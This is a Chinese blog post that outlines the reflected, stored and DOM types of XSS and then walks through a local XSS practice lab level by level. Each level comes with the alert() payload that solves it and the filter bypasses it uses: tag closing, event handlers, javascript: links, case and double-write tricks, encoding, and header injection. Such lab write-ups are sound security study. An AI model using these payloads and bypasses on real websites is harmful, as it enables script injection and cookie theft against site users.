XSS种类
1、反射型
提交的数据成功的实现了XSS,但是仅仅是对你这次访问产生了影响,是非持久型攻击
2、存储型
提交的数据成功的实现了XSS,存入了数据库/文件,别人访问这个页面的时候就会自动触发
3、dom型
利用dom树触发xss
见框就插
用户输入的数据被当做html语句放到了页面上去执行
<h1>666</h1> 存储
<script>alert('ctsz1')</script> 弹窗
<iframe src=http://baidu.com> 客户端攻击 ddos
cookie 凭证
onclick="alert('ctsz1') 点击
xss闯关
第一关 直接在name中加入<script>alert('ctsz1')</script>
第二关 在语句前面加上"><script>alert('ctsz1')</script> 绕过 闭合前面的语句
第三关 存储型
onfocus 事件在对象获得焦点时发生。
onfocus 通常用于 <input>, <select>, 和<a>.
插入'onfocus=javascript:alert('ctsz1') >语句然后点击输入框即可成功
第四关"onfocus=javascript:alert('ctsz1') > 和第四关一样 前面加双引号
第五关
此处无法通过<script>标签或触发事件来执行js代码的话,那么可以换一个标
签来执行js代码。
"><a href=javascript:alert('ctsz1') >
第六关 "ONocus=javascript:alert('ctsz1') >
"><a HRef=javascript:alert('ctsz1') > 改大小写绕过
第七关"oonnfocus=javascript:alert('ctsz1') >
"><a hrhrefef=javascrscriptipt:alert('ctsz1') > 双写关键字绕过
第八关 用编码工具将javascript:alert('ctsz1')进行编码
第九关javascript:alert('ctsz1')在后面加上一个//http:// 前面必须要加上注释符//
第十关 先输入<script>alert('ctsz1')</script>&t_link=" type="text"&t_history=" type="text"&t_sort=" type="text" 发现 t_sort标签可供利用
<script>alert('ctsz1')</script>&t_sort=" type="text" onclick="alert('ctsz1')
第十一关 先输入<script>alert('ctsz1')</script>&t_link=" type="text"&t_history=" type="text"&t_sort=" type="text" 发现 t_sort标签可供利用
然后抓包 加一个referer值 "type="text" onclick="alert('ctsz1') 就可以绕过
第十二关 抓包发现 t_ua这个标签,并且其中的value属性的值和数据包中User-Agent头的值一样
先闭合前面的value属性 "type="text" onclick="alert('ctsz1') 就可绕过
第十三关 抓包发现数据包中cookie头是有值的,而且这个值在响应的网页
源码中的t_cook标签中出现了。 "type="text" onclick="alert('ctsz1') 就可绕过
第十五关http://127.0.0.1/xsstest/level1.php?name=test
xss/level15.php?src='http://127.0.0.1/xsstest/level1.php?name=<img src=asd one rror=alert(1)>'
ng-include 文件包含可以包含之前的文件
第十六关 将参数值中的script替换成 将参数值中的空格也替换成 将参数值中的/符号替换成
<img
asrc=1
aonerror=alert(1)>
用%0A空格隔开<img%0asrc=1%0aonerror=alert(1)>
第十七关 改后端代码将 指向的swf文件改为index.png 然后onclick=alert() 点击图片绕过或者onmouseover=alert()鼠标移动绕过
标签:XSS,onclick,text,javascript,alert,ctsz1,type From: https://www.cnblogs.com/Ctsz1/p/16740209.html